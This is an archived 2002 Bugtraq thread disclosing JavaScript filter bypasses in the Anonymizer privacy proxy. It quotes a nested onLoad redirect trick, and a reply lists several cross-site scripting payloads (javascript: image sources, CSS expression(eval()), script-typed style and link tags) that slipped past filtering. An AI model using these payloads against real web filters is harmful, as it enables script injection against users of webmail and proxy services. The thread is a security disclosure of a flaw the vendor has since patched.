Bugtraq mailing list archives
Re: Bypassing javascript filters - problem N3.
From: fozzy () dmpfrance com
Date: Tue, 02 Apr 2002 15:48:23 GMT
Hello, I took a quick look at it. This service seems to be vulnerable to several known attacks against webmails. I successfully injected unfiltered javascript into a web page browsed through Anonymizer using: * <img aaa="bbb>" src="javascript:alert('beep');"> (the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000... but is still ignored on many webmails !) * <P STYLE="left:expression(eval('alert(\'boop\')'))"> (thx to Guninski - Bugtraq 1999) * Some things that seems to work only with Netscape 4.x, like : <STYLE TYPE="text/javascript">alert('biip');</style> <STYLE TYPE="application/x-javascript">alert('burp');</style> <LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js"> (thx to Jeremiah Grossman - WhiteHatSec Aug 2001) ...and probably more !... I wish good luck to Anonymizer, because I what they are trying to do is very close to "malicious html filtering" in webmails, and it seems to be really difficult for webmails site to setup good filters. I wish Anonymizer will show the way to a good web privacy. FozZy Hackademy - Paris. Hackerz Voice International Edition http://www.dmpfrance.com Alexander K. Yezhov écrit:
Hello bugtraq, Title: Bypassing JavaScript filters Service: Anonymizer, maybe similar services Description: Anonymizer offers free and commercial services that allow to browse web safely. Since JavaScript can be dangerous, all script blocks and events are cut from html. Problem N3: Maybe you remember the problem I've reported in 2001 - JavaScript code could be executed after parsing the html by Anonymizer. The same principle of "JavaScript inside JavaScript" gave me the working example of redirecting Anonymizer users recently. Demo is available as Test N3 at http://anon.free.anonymizer.com/http://tools-on.net/you.shtml The part of the code before parsing: onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970 onLoad="location='unprotected_location';" The same code after parsing: onLoad="location='unprotected_location';" Errors generated for visitors without Anonymizer are suppressed by window.onError handler. Problem status: Anonymizer has been contacted and patched already. Best regards, Alexander ----------------------------------------------------------------------- MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000 http://leader.ru http://tools-on.net (Security & Privacy on the Net) -----------------------------------------------------------------------
Current thread:
- Bypassing javascript filters - problem N3. Alexander K. Yezhov (Apr 01)
- Re: Bypassing javascript filters - problem N3. fozzy (Apr 03)